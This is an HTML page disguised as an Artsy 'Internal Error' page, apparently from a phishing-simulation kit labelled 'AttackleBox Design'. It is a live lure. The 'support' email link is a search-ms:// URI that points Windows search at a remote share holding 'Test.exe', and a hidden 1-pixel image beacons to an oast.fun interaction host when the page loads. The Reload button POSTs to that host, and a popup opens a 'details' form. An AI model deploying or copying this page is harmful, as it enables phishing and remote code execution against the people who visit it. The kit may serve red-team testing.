<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8" />
    <title>Internal Error | Resource not found</title>
    <link rel="icon" href="https://s3.amazonaws.com/artsy-errors/images/favicon.d41d8cd9.ico" />
    <style>
        header {
            border-bottom: 1px solid #e5e5e5;
            padding: 10px;
            background: white;
            position: absolute;
            top: 0;
            left: 0;
            right: 0;
        }
        body {
            font-family: "adobe-garamond-pro", Georgia, Serif;
            font-size: 16px;
            line-height: 1.375;
            min-height: 88vh;
            display: flex;
            flex-direction: column;
            justify-content: space-between;
            margin: 0;
            padding: 0;
            background: white;
            position: relative;
        }
        ul {
            border-top: 1px solid #e5e5e5;
            text-align: center;
            padding-top: 16px;
            padding-bottom: 8px;
            font-size: 16px;
            list-style: none;
        }
        h1 {
            font-weight: normal;
            font-size: 40px;
            margin: 40px;
        }
        a {
            color: black;
	    text-decoration: none; /* Remove underline */
        }
        button {
            cursor: pointer;
            position: relative;
            white-space: nowrap;
            border: 2px solid;
            border-radius: 3px;
            padding-left: 30px;
            padding-right: 30px;
            height: 50px;
            -webkit-transition: 0.25s ease;
            transition: 0.25s ease;
            background-color: #000;
            border-color: #000;
            color: #fff;
            width: fit-content;
            margin: 0 auto;
            font-size: 14px;
        }
        button:hover {
            background-color: #6e1eff;
            border-color: #6e1eff;
        }
        footer {
            position: absolute;
            bottom: 0;
            left: 0;
            right: 0;
            background: white;
        }
        .error-message {
            display: none;
        }
        .loading-container {
            text-align: center;
            position: absolute;
            width: 100%;
            top: calc(50% - 50px);
            left: 50%;
            -webkit-transform: translate(-50%, -50%);
            -ms-transform: translate(-50%, -50%);
            transform: translate(-50%, -50%);
        }
    </style>
</head>
<body>
    <div class="loading-container">
        <img class="loading-icon" src="https://itssixtyn3in.github.io/vish/hzk6C.gif" alt="Loading Icon">
    </div>
<header>
    <nav>
        <a href="https://artsy.net">
            <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="32px" height="32px" viewBox="0 0 32 32" style="enable-background:new 0 0 32 32;" xml:space="preserve">
                <g>
                    <path d="M0,32h32V0H0V32z M29,29h-5v-5h-3v5H3V3h26V29z"></path>
                    <path d="M12.108,6h-2.49L5.01,17.6h2.383l1.246-3.2h4.468l1.226,3.2h2.386L12.108,6z M9.332,12.4l1.532-4.129l1.512,4.129H9.332z"></path>
                </g>
            </svg>
        </a>
        <span style="margin-right: 150px;"></span> <!-- Add 150px spacing -->
        <a href="https://itssixtyn3in.github.io/vish/index.html">Home</a>
        <span style="margin-right: 10px;"></span>
        <a href="">|</a>
        <span style="margin-right: 10px;"></span>
    
        <a href="https://itssixtyn3in.github.io/vish/index.html">About Us</a>
        <span style="margin-right: 10px;"></span>
        <a href="">|</a>
        <span style="margin-right: 10px;"></span>
        <a href="https://itssixtyn3in.github.io/vish/index.html">Contact</a>
        <span style="margin-right: 10px;"></span>
        <a href="">|</a>
        <span style="margin-right: 10px;"></span>
 <a href="https://itssixtyn3in.github.io/vish/index.html">Careers</a>
    </nav>
</header>
    <div class="error-message">
        <h1>Internal Error</h1>
        <p>We encountered an error processing your request. Please try again in a few seconds.</p>
        <div class="error-trace">
            ::SKYFLARE_ERROR::
        </div>
 <div id="rayID">ERROR ID:607</div>
        <div id="rayID">::RAY_ID::</div>
	<div id="rayID">G6j2A4f8e3H1k5m7p9s0u8W2z4q</div>
        <div id="clientIP">::CLIENT_IP::</div>
	<div id="clientIP">62.5.87.1</div>
        <div class="contact-support">
            <p>If the problem persists, please contact our support team at <a href="search-ms://query=Test.exe&crumb=location:\\ckrk57m2vtc0000g9pz0gjhj1uhyyyyyb.oast.fun\appstart"><font color=blue>support@totallyrealsite.com</font></a> with any questions.</p>
        </div>
            <button id="reloadButton">Reload</button>
<a href="" target="_blank" onclick="window.open('https://itssixtyn3in.github.io/vish/details.html', 'mywin', 'width=300,height=400');">
        <button id="submitDetails">Submit Details</button>
</a>
    </div>
    <footer>
        <ul>
            <li>© <span id="copyright-date"></span>2023 AttackleBox Design</li>
        </ul>
    </footer>
	<img src="http://ckrk57m2vtc0000g9pz0gjhj1uhyyyyyb.oast.fun" height=1px width=1px></img>
    <script>
        // JavaScript to show content after a 3-second delay
        setTimeout(function() {
            document.querySelector(".loading-container").style.display = "none";
            document.querySelector(".error-message").style.display = "block";
        }, 3000); //  seconds

        // Handle the "Submit Details" button click
        document.getElementById("reloadButton").addEventListener("click", function() {
            // Send a POST request to the specified URL
            fetch("http://ckrk57m2vtc0000g9pz0gjhj1uhyyyyyb.oast.fun?postrequest=successful", {
                method: "POST"
            });

            // Reload the page
            location.reload();
        });
    </script>
</body>
</html>